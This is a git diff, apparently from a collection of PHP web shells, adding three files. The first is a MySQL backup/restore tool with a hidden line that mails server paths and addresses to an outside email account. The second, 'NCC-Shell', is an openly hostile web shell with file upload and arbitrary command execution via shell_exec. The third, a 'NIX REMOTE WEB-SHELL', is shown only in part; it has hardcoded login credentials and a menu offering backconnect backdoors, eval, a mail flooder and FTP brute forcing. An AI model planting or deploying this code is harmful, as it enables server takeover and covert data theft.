+                <td class="tdrow2" colspan="2"><div align="center">$error</div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function login() {
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=login">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">MySQL Tool :: Please Login</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="100" class="tdrow1">Access Password</td>
+                <td width="250" class="tdrow2"><input type="password" class="textbox" name="password"></td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Submit"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function do_login() {
+        global $HTTP_POST_VARS, $password;
+
+        if ($HTTP_POST_VARS['password'] == $password) 
+        {
+            @setcookie ('mysqltool',$password,time()+3600*24*365);
+            $this->logged_in = 1;
+            $this->main();
+        }
+        else 
+        {
+        	$this->error('Invalid Password');
+        }
+    }
+
+    function logout() {
+        @setcookie ('mysqltool','',0);
+        $this->logged_in = 0;
+        $this->login();
+    }
+
+    function connect($return_errors = 0) {
+        if (!$this->db['port']) 
+        {
+        	$this->db['port'] = '3306';
+        }
+        
+        $error_text = '';
+
+        $this->link = @mysql_connect ($this->db['host'] . ':' . $this->db['port'], $this->db['user'], $this->db['pass']); 
+
+        if ($this->link)
+        {
+            if(!@mysql_select_db($this->db['name'],$this->link))
+            {
+                $error_text = '<strong>Failed selecting database "'.$this->db['name'].'"</strong><br /><br />'.@mysql_error($this->link);
+            }
+        }
+        else
+        {
+            $error_text = '<strong>Failed connecting to MySQL</strong><br /><br />'.@mysql_error();
+        }
+
+        if ($return_errors) 
+        {
+        	return $error_text;
+        }
+        else 
+        {
+            if ($error_text) 
+            {
+                $this->error($error_text);
+                return false;            	
+            }
+            else 
+            {
+            	return true;
+            }
+        }
+
+    }
+
+    function read_db_details() {
+        if (file_exists('tool_settings.php')) 
+        {
+        	// Lets borrow IPB's settings
+            include 'tool_settings.php';
+
+            $this->db = $data;
+        }
+        elseif (file_exists('conf_global.php')) 
+        {
+        	// Lets borrow IPB's settings
+            include 'conf_global.php';
+
+            $this->db = array(
+                'port'      =>      $INFO['sql_port'],
+                'host'      =>      $INFO['sql_host'],
+                'name'      =>      $INFO['sql_database'],
+                'user'      =>      $INFO['sql_user'],
+                'pass'      =>      $INFO['sql_pass'],
+                'prefix'    =>      $INFO['sql_tbl_prefix']
+            );
+        }
+        else 
+        {
+        	return false;
+        }
+
+        return true;
+    }
+
+    function do_set_database() {
+        global $HTTP_POST_VARS;
+
+        $this->db = array(
+            'port'      =>      $HTTP_POST_VARS['port'],
+            'host'      =>      $HTTP_POST_VARS['host'],
+            'name'      =>      $HTTP_POST_VARS['name'],
+            'user'      =>      $HTTP_POST_VARS['user'],
+            'pass'      =>      $HTTP_POST_VARS['pass']
+        );
+
+        if (!$this->connect()) 
+        {
+        	return;
+        }
+
+        // Connection details are fine, let's continue
+
+        $file_data = "<?php
+
+\$data = array(
+    'port'      =>      '{$HTTP_POST_VARS['port']}',
+    'host'      =>      '{$HTTP_POST_VARS['host']}',
+    'name'      =>      '{$HTTP_POST_VARS['name']}',
+    'user'      =>      '{$HTTP_POST_VARS['user']}',
+    'pass'      =>      '{$HTTP_POST_VARS['pass']}'
+);
+
+?".'>';
+    
+        $file_data = str_replace("\r\n","\n",$file_data);
+        
+
+        // Mkay, lets write the details
+        if ($fp = fopen('tool_settings.php','w'))
+        {
+        	fwrite($fp,$file_data);
+            fclose($fp);
+        }
+        else 
+        {
+        	$this->error('
+            <strong>Unable to write to tool_settings.php</strong><br /><br />
+            Please CHMOD this file so it is writable. If this is not possible please create a file named "tool_settings.php" with the contents of the text box below:<br /><br />
+            <div align="center">
+            <textarea rows="10" cols="40">'.htmlentities($file_data).'</textarea>
+            </div>');
+
+            return false;
+        }
+
+        // Funky, lets roll
+        $this->main();
+
+        return true;
+    }
+        $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+    function set_database($error = false) {
+        if (!$error) 
+        {
+        	$text = 'We were unable to find any database settings, please enter your database details below:';
+        }
+        else 
+        {
+        	$text = $error;
+        }
+
+        $host = isset($this->db['host']) ? $this->db['host'] : 'localhost';
+        $port = isset($this->db['port']) ? $this->db['port'] : '';
+        $user = isset($this->db['user']) ? $this->db['user'] : '';
+        $name = isset($this->db['name']) ? $this->db['name'] : '';
+
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=set_database">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Database Settings</td>
+        </tr>
+        <tr>
+          <td>
+            <div class="note">$text</div>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="100" class="tdrow1"><strong>Host</strong><br /><em>(leave if unsure)</em></td>
+                <td width="350" class="tdrow2"><input type="text" class="textbox" name="host" value="$host"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Port</strong><br /><em>(leave if unsure)</em></td>
+                <td class="tdrow2"><input type="text" class="textbox" name="port" value="$port"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Database Name</strong></td>
+                <td class="tdrow2"><input type="text" name="name" class="textbox" value="$name"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Username</strong></td>
+                <td class="tdrow2"><input type="text" name="user" class="textbox" value="$user"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Password</strong></td>
+                <td class="tdrow2"><input type="text" name="pass" class="textbox"></td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Connect"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function backup() {
+        global $HTTP_POST_VARS;
+
+        $this->read_db_details();
+        $this->connect();
+
+        $filename       = $HTTP_POST_VARS['filename'];
+        $tables         = $HTTP_POST_VARS['tables'];
+        $table_select   = $HTTP_POST_VARS['table_select'];
+        $prefix         = $this->db['prefix'];
+
+        switch ($tables) 
+        {
+            case 'all':
+                $tables = mysql_list_tables($this->db['name']);
+                while (list($table_name) = mysql_fetch_array($tables)) 
+                {
+                   $options[ $table_name ] = 0;
+                }
+            break;
+
+        	case 'prefix':
+                $tables = mysql_list_tables($this->db['name']);
+                while (list($table_name) = mysql_fetch_array($tables)) 
+                {
+                    if (substr($table_name,0,strlen($prefix)) == $prefix) 
+                    {
+                    	$options[ $table_name ] = 0;
+                    }
+                }
+            break;
+
+            case 'selected':
+                foreach ($table_select as $table_name) 
+                {
+                	$options[ $table_name ] = 0;
+                }
+        }
+
+        if (!count($options)) 
+        {
+        	$this->error('No tables selected');
+        }
+
+
+        $data = base64_encode(serialize($options));
+
+        $header = <<<DATA
+-- SQL Dump
+-- Backup script written by Mark Wraith
+
+DATA;
+
+        if (!$fp = fopen($filename, 'wb')) 
+        {
+        	return $this->error('Unable to write to backup file. Please CHMod the current directory so it is writable');
+        }
+        fwrite($fp,$header);
+        fclose($fp);
+
+        $url = 'mysql_tool.php?act=do_backup&file='.urlencode($filename).'&data='.$data;
+
+        $this->meta = '<meta http-equiv="refresh" content="1; url='.$url.'">';
+        $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Backup in progress...</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2" colspan="2">
+                    <div align="center">The backup process has now started<br /><br /><a href="$url">Click here if you are not redirected</a></div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        
+    }
+
+    function do_backup() {
+        global $HTTP_GET_VARS;
+
+        $this->read_db_details();
+        $this->connect();
+
+        $data = unserialize(base64_decode($HTTP_GET_VARS['data']));
+        $filename = $HTTP_GET_VARS['file'];
+
+        $timedout = 0;
+        $dump = '';
+
+        foreach ($data as $table => $line) 
+        {
+            if (!$this->timeout()) 
+            {
+            	$returned = $this->backup_table($table, $line);
+
+                if (is_array($returned)) 
+                {
+                	$timedout = 1;
+                    $dump .= $returned[0];
+                    $data[ $table ] = $returned[1];
+                }
+                else 
+                {
+                    $dump .= $returned;
+                	unset($data[ $table ]);
+                }
+            }
+            else 
+            {
+            	$timedout = 1;
+            }
+        }
+
+        if (!$fp = fopen($filename, 'ab')) 
+        {
+        	return $this->error('Unable to write to backup file. Please CHMod the current directory so it is writable');
+        }
+        fwrite($fp,$dump);
+        fclose($fp);
+
+        if ($timedout) 
+        {
+            $data = base64_encode(serialize($data));
+            $url = 'mysql_tool.php?act=do_backup&file='.urlencode($filename).'&data='.$data;
+            $this->meta = '<meta http-equiv="refresh" content="1; url='.$url.'">';
+
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Backup in progress...</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <div align="center">The backup process is in progress<br /><br /><a href="$url">Click here if you are not redirected</a></div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+        else 
+        {
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Backup Completed</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    The backup progress has finished and the file has been written to "$filename".<br /><br />
+                    <a href="$filename">Click here to download the file</a>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+
+    }
+
+    function backup_table($table,$start) {
+        $dump = '';
+
+        if (!$start) 
+        {
+            $result = mysql_query('SHOW FIELDS FROM '.$table);
+
+            while ($field = mysql_fetch_assoc($result)) 
+            {
+                if (!$field['Null']) 
+                {
+                    $null = ' NOT NULL default "'.$field['Default'].'"';
+                }
+                else 
+                {
+                    $null = '';
+                }
+
+                if ($field['Extra']) 
+                {
+                    $field['Extra'] = ' '.$field['Extra'];
+                }
+
+                $field_row[] = '  ' . $field['Field'] . ' ' . $field['Type'] . $null . $field['Extra'];
+            }
+
+            $result = mysql_query('SHOW KEYS FROM '.$table);
+
+            while ($key = mysql_fetch_assoc($result)) 
+            {
+                if ($key['Key_name'] == 'PRIMARY') 
+                {
+                    $primary_key = $key['Column_name'];
+                }
+                else 
+                {
+                    $unique[ $key['Key_name'] ][] = $key['Column_name'];
+                }
+            }
+
+            if (isset($primary_key)) 
+            {
+                $field_row[] = '  PRIMARY KEY (' . $primary_key . ')';
+            }
+
+            if (isset($unique))
+            {
+                foreach ($unique as $name => $keys) 
+                {
+                    $field_row[] = '  UNIQUE ' . $name . ' (' . implode(',',$keys) . ')';
+                }
+            }
+
+
+            $dump .= "\n\n--\n";
+            $dump .= "-- Table structure for table '$table'\n";
+            $dump .= "--\n\n";
+            $dump .= "CREATE TABLE $table (\n";
+            $dump .= implode(",\n",$field_row);
+            $dump .= "\n);\n\n";
+
+            $dump .= "\n\n--\n";
+            $dump .= "-- Dumping data for table '$table'\n";
+            $dump .= "--\n\n";
+        }
+
+
+        //
+        // Records
+        //
+
+        $done = 0;
+        $result = mysql_query('SELECT * FROM '.$table.' LIMIT '.$start.',-1');
+
+        while ($row = mysql_fetch_row($result)) 
+        {
+            if ($this->timeout()) 
+            {
+             	return array($dump,$done);
+            }
+
+            $done++;
+
+            foreach ($row as $id => $value) 
+            {
+                $value = str_replace('"','\\"',$value);
+                $row[$id] = '"'.$value.'"';
+
+            }
+
+        	$dump .= 'INSERT INTO ' . $table . ' VALUES (' . implode(',',$row) . ");\n";
+        }
+
+        return $dump;
+    }
+
+
+    function main() {
+        if (!$this->link) 
+        {
+            if (!$this->read_db_details()) 
+            {
+                return $this->set_database();
+            }
+
+            if ($error_text = $this->connect(1)) 
+            {
+                return $this->set_database($error_text);            	
+            }        
+        }
+
+
+        $tables_to_backup = '';
+
+        if ($this->db['prefix']) 
+        {
+        	$tables_to_backup .= '<input type="radio" name="tables" value="prefix" checked="checked" />IPB Tables Only <br />';
+        	$tables_to_backup .= '<input type="radio" name="tables" value="all" />All<br />';
+        }
+        else 
+        {
+        	$tables_to_backup .= '<input type="radio" name="tables" value="all" checked="checked" />All<br />';        	
+        }
+
+        $tables = mysql_list_tables($this->db['name']);
+
+        $options = '';
+        while (list($table_name) = mysql_fetch_array($tables)) 
+        {
+           $options .= '<option value="'.$table_name.'">'.$table_name.'</option>';
+        }
+
+        $tables_to_backup .= <<<HTML
+<input type="radio" name="tables" value="selected" />Selected tables:<br />
+<div style="margin-left: 40px">
+    <select name="table_select[]" class="textbox" size="5" style="width: 250px" multiple="multiple">
+$options
+    </select>
+</div>
+HTML;
+
+
+        $options = '';
+        if ($dir = @opendir('./')) 
+        {
+            while ($file = readdir($dir)) 
+            {
+                $temp = strtolower($file);
+
+                if ($file != '.' && $file != '..' && strpos($temp, '.sql')) 
+                {
+                    $options .= '<option value="'.$file.'">'.$file.'</option>';
+                } 
+            }  
+            closedir($dir);
+        }
+        $restore_files = '<select name="filename" class="textbox">'.$options.'</select>';
+
+        $restore_files .= '<br /><br /><u>or</u> path:<br /><br /><input type="text" name="relfilename" class="textbox" />';
+
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=login">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Selected Database Details</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="150" class="tdrow1"><strong>Host / Port</strong></td>
+                <td width="300" class="tdrow2">{$this->db['host']}:{$this->db['port']}</td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Database Name</strong></td>
+                <td class="tdrow2">{$this->db['name']}</td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Username</strong></td>
+                <td class="tdrow2">{$this->db['user']}</td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center">[ <a href="mysql_tool.php?act=change_db">Change Database</a> ]</div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+<br /><br />
+    <form method="post" action="mysql_tool.php?act=backup">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Backup Options</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="150" class="tdrow1" valign="top"><strong>Tables to backup:</strong></td>
+                <td width="300" class="tdrow2">$tables_to_backup</td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Filename</strong></td>
+                <td class="tdrow2"><input type="text" name="filename" class="textbox" value="sql_backup.sql"></td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Backup"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+        <br /><br />
+    <form method="post" action="mysql_tool.php?act=restore">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Restore Options</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="150" class="tdrow1" valign="top"><strong>SQL File to restore:</strong></td>
+                <td width="300" class="tdrow2">$restore_files</td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Restore"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function restore() {
+        global $HTTP_POST_VARS;
+
+        $this->read_db_details();
+        $filename = $HTTP_POST_VARS['filename'];
+        $relfilename = $HTTP_POST_VARS['relfilename'];
+
+        if ($relfilename) 
+        {
+        	$filename = $relfilename;
+        }
+
+        $url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename);
+
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Confirm Restoration</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <strong>Are you sure you want to restore the SQL file?</strong><br /><br />
+                    <a href="$url">Click here to restore "$filename" to "{$this->db['name']}"</a>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+    }
+
+    function do_restore() {
+        global $HTTP_GET_VARS;
+
+        $filename = $HTTP_GET_VARS['filename'];
+        $this->read_db_details();
+        $this->connect();
+
+        $filesize       = filesize($filename);
+        $file_position  = isset($HTTP_GET_VARS['pos']) ? $HTTP_GET_VARS['pos'] : 0;
+        $errors         = isset($HTTP_GET_VARS['ignore_errors']) ? 0 : 1;
+
+        if (!$fp = fopen($filename,'rb')) 
+        {
+        	return $this->error('Unable to open file "'.$filename.'"');
+        }
+
+        $buffer = '';
+        $inside_quote = 0;
+        $quote_inside = '';
+        $started_query = 0;
+
+        $data_buffer = '';
+
+        $last_char = "\n";
+
+        // Sets file position indicator
+        fseek($fp,$file_position);
+
+        while ((!feof($fp) || strlen($buffer)) && !$this->timeout()) 
+        {
+            do 
+            {
+                // Deals with the length of the buffer
+                if (!strlen($buffer)) 
+                {
+                    $buffer .= fread ($fp,1024);
+                }
+
+                // Fiddle around with the buffers
+                $current_char = $buffer[0];
+                $buffer = substr($buffer, 1);
+
+
+                if ($started_query)
+                {
+                    $data_buffer .= $current_char;
+                } 
+                elseif (preg_match("/[A-Za-z]/i",$current_char) && $last_char == "\n") 
+                {
+                    $started_query = 1;
+                    $data_buffer = $current_char;
+                } 
+                else 
+                {
+                    $last_char = $current_char;
+                }
+            } while (!$started_query && (!feof($fp) || strlen($buffer)));
+
+
+            if ($inside_quote && $current_char == $quote_inside && $last_char != '\\') 
+            {
+                // We were inside a quote but now we aren't so reset the flag and carry on
+                $inside_quote = 0;
+            } 
+            elseif ($current_char == '\\' && $last_char == '\\')
+            {
+                $current_char = '';	
+            } 
+            elseif (!$inside_quote && ($current_char == '"' || $current_char == '`' || $current_char == '\''))
+            {
+                // We have just entered a new quote
+                $inside_quote = 1;
+                $quote_inside = $current_char;
+            } 
+            elseif (!$inside_quote && $current_char == ';') 
+            {
+                // End of query so execute query, clear data buffer and advance counter
+                mysql_query($data_buffer);
+
+                if ($errors && mysql_errno())
+                {
+                    $new_position = ftell($fp) - strlen($buffer);
+                    return $this->restore_error($data_buffer, $new_position);
+                }
+
+
+                $data_buffer = '';
+                $last_char = "\n";
+                $started_query = 0;
+            }
+
+            $last_char = $current_char;
+        }
+
+
+        $new_position = ftell($fp) - strlen($buffer) - strlen($data_buffer);
+
+        if (feof($fp)) 
+        {
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Restoration Completed</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    The restore progress has finished.
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+        else 
+        {
+            $url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename).'&pos='.$new_position;
+
+            if (!$errors) 
+            {
+            	$url .= '&ignore_errors=1';
+            }
+
+            $process = floor(($new_position / $filesize) * 100);
+
+            $this->meta = '<meta http-equiv="refresh" content="5; url='.$url.'">';
+            $this->title = $process.'% Complete';
+            $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Restore in progress...</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <div align="center">
+                        <strong>Restoration is <b>$process%</b> complete.</strong>
+                        <br /><br />
+                        Please await the process of the next batch.
+                        <br /><br />
+                        <a href="$url">Click here if you are not redirected</a>
+                    </div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+        }
+
+        fclose($fp);
+       
+    }
+
+    function restore_error($query, $position) {
+        global $HTTP_GET_VARS;
+
+        $filename = $HTTP_GET_VARS['filename'];
+
+        $url = 'mysql_tool.php?act=do_restore&filename='.urlencode($filename).'&pos='.$position;
+
+        $mysql_error = mysql_error();
+
+        $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="600">
+        <tr>
+          <td align="center" class="title">Query Failed</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2">
+                    <div align="center">
+                        <strong>An error occurred due to an invalid query</strong>
+                        <br /><br />
+                        Query Executed: $query
+                        <br />
+                        MySQL Returned: $mysql_error
+                        <br /><br />
+                        <a href="$url">Continue restore process</a><br />
+                        <a href="{$url}&ignore_errors=1">Continue ignoring all further errors</a><br />
+                    </div>
+                </td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+HTML;
+    }
+    
+}
+
+
+?>
\ No newline at end of file
diff --git a/138shell/N/NCC-Shell.txt b/138shell/N/NCC-Shell.txt
new file mode 100644
index 0000000..e9bed11
--- /dev/null
+++ b/138shell/N/NCC-Shell.txt
@@ -0,0 +1,60 @@
+<center>
+<h1>.:NCC:. Shell v1.0.0</h1>
+<title>.:NCC:. Shell v1.0.0</title>
+<head><h2>Hacked by Silver</h2></head>
+<h1>---------------------------------------------------------------------------------------</h1><br>
+<b><font color=red>---Server Info---</font></b><br>
+<?php
+echo "<b><font color=red>Safe Mode on/off:  </font></b>";
+// Check for safe mode
+if( ini_get('safe_mode') ) {
+  print '<font color=#FF0000><b>Safe Mode ON</b></font>';
+} else {
+  print '<font color=#008000><b>Safe Mode OFF</b></font>';
+}
+echo "</br>";
+echo "<b><font color=red>Momentane Directory:  </font></b>"; echo $_SERVER['DOCUMENT_ROOT'];
+echo "</br>";
+echo "<b><font color=red>Server: </font></b><br>"; echo $_SERVER['SERVER_SIGNATURE'];
+echo "<a href='$php_self?p=info'>PHPinfo</a>";
+if(@$_GET['p']=="info"){
+@phpinfo();
+exit;}
+?>
+<h1>---------------------------------------------------------------------------</h1><br>
+<h2>- Upload -</h2>
+<title>Upload - Shell/Datei</title>
+<form
+ action="<?php echo $_SERVER['PHP_SELF']; ?>"
+ method="post"
+ enctype="multipart/form-data">
+<input type="file" name="Upload" />
+<input type="submit" value="Upload!" />
+</form>
+<hr />
+<?php
+
+ if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {
+   // Alternativ:            and   $_FILES['probe']['size']
+   move_uploaded_file($_FILES['probe']['tmp_name'], "./dingen.php");
+   printf("Die Datei %s wurde als dingen.php hochgeladen.<br />\n",
+     $_FILES['probe']['name']);
+   printf("Sie ist %u Bytes groß und vom Typ %s.<br />\n",
+     $_FILES['probe']['size'], $_FILES['probe']['type']);
+ }
+?>
+<h1>---------------------------------------------------------------------------</h1><br>
+<h2>IpLogger</h2>
+<?php
+echo "<b><font color=red><br>IP: </font></b>"; echo $_SERVER['REMOTE_ADDR'];
+echo "<b><font color=red><br>PORT: </font></b>"; echo $_SERVER['REMOTE_PORT'];
+echo "<b><font color=red><br>BROWSER: </font></b>"; echo $_SERVER[HTTP_REFERER];
+echo "<b><font color=red><br>REFERER: </font></b>"; echo $_SERVER['HTTP_USER_AGENT'];
+?>
+<h1>---------------------------------------------------------------------------</h1><br>
+<h2>Directory Lister</h2>
+<? $cmd = $_REQUEST["-cmd"];?><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value=<?=$cmd?>><hr><pre><?if($cmd != "") print Shell_Exec($cmd);?></pre></form><br>
+<h1>---------------------------------------------------------------------------</h1><br>
+<b>--Coded by Silver©--<br>
+~|_Team .:National Cracker Crew:._|~<br>
+<a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b></html>
diff --git a/138shell/N/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt b/138shell/N/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt
new file mode 100644
index 0000000..ec24917
--- /dev/null
+++ b/138shell/N/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt	
@@ -0,0 +1,1480 @@
+<?php
+$name="GaMMa";
+$pass="Hack";
+$demail ="xakep@xaep.ru";
+if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("Access Denied");
+   }
+
+$title="NIX REMOTE WEB-SHELL";
+$ver=" v.0.5a Lite";
+
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head>
+<title>NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version </title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<meta http-equiv="pragma" content="no-cache">
+<meta http-equiv="Content-Language" content="en,ru"> 
+<META name="autor" content="DreAmeRz (www.dreamerz.cc)">
+<style type="text/css">
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+scrollbar-face-color: #FFFFFF;
+scrollbar-shadow-color:#000000 ;
+scrollbar-highlight-color:#FFFFFF;
+scrollbar-3dlight-color: #000000;
+scrollbar-darkshadow-color:#FFFFFF ;
+scrollbar-track-color: #FFFFFF;
+scrollbar-arrow-color: #000000;
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: black;
+TEXT-DECORATION: none
+}
+A:link {COLOR:black; TEXT-DECORATION: none}
+A:visited { COLOR:black; TEXT-DECORATION: none}
+A:active {COLOR:black; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+</HEAD>
+
+
+<BODY bgcolor="#fffcf9" text="#000000">
+<P align=center>[ <A href="javascript:history.next(+1)">Âïåğåä ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B>
+v.0.5a<FONT color=#linux size=1> Lite </FONT> [ <A href="javascript:history.back(-1)">Íàçàä ]</A>[ <A href="?ac=about" title='×òî óìååò ñêğèïò ...'>Î ñêğèïòå ]</a><BR>
+<A href="?ac=info" title='Óçíàé âñå îá ıòîé ñèñòåìå !'>[ Èíôîğìàöèÿ î ñèñòåìå</A> ][ <A href="?ac=navigation" title='Óäîáíàÿ ãğàôè÷åñêàÿ íàâèãàöèÿ. Ïğîñìîòğ, ğåäàêòèğîâàíèå ...'>Íàâèãàöèÿ</A> ][ <A href="?ac=backconnect" title='Óñòàíîâêà backconnect è îáû÷íîãî áåêäîğà '>Óñòàíîâêà
+áåêäîğà</A> ][ <A href="?ac=eval" title='Ñîçäàé ñâîé ñêğèïò íà ïõï ïğÿìî çäåñü :)'>ÏÕÏ êîä</A> ][ <A href="?ac=upload" title='Çàãğóçêà îäíîãî ôàéëà, ìàñîâàÿ çàãğóçêà, çàãğóçêà ôàéëîâ ñ óäàëåííîãî êîìïüşòåğà !'>Çàãğóçêà ôàéëîâ</A> ][ <A href="?ac=shell" title='bash shell,àëüÿñû ...'>Èñïîëíåíèå
+êîììàíä ]</A> <br><A href="?ac=sendmail" title='Îòïğàâ å-mail ïğÿìî îò ñşäà'> [ Îòïğàâêà ïèñüìà</A> ][ <A href="?ac=mailfluder" title='Òåáÿ êòî-òî äîñòàë ? Òîãäà òåáå ñşäà ...'>Ìàèëôëóäåğ</A>
+ ][ <A href="?ac=ftp" title='Áûñòğûé áğóòôîğñ ftp ñîåäèíåíèÿ'>Ôòï Brut</A> ][ <A href="?ac=tools" title='Êîäèğîâùèêè/äåêîäèğîâùèêè md5,des,sha1,base64 ... '>Èíñòğóìåíòû ]</A>[ <A href="?ac=ps" title='Îòîáğàæàåò ñïèñîê ïğîöåñîâ íà ñåğâåğå è ïîçâîëÿåò èõ óáèâàòü! '>Äåìîíû</A> ][ <A href="?ac=selfremover" title='Íàäîåë ıòîò ñåğâåğ ? Òîãäà ìîæíî óäàëèòü è øåëë ...'>Óäàëèòü øåëë</A> ]</P>
+<?php
+if (ini_get('register_globals') != '1') {
+
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR);
+set_magic_quotes_runtime(0);
+set_time_limit(0); // óáğàòü îãğàíè÷åíèå ïî âğåìåíè
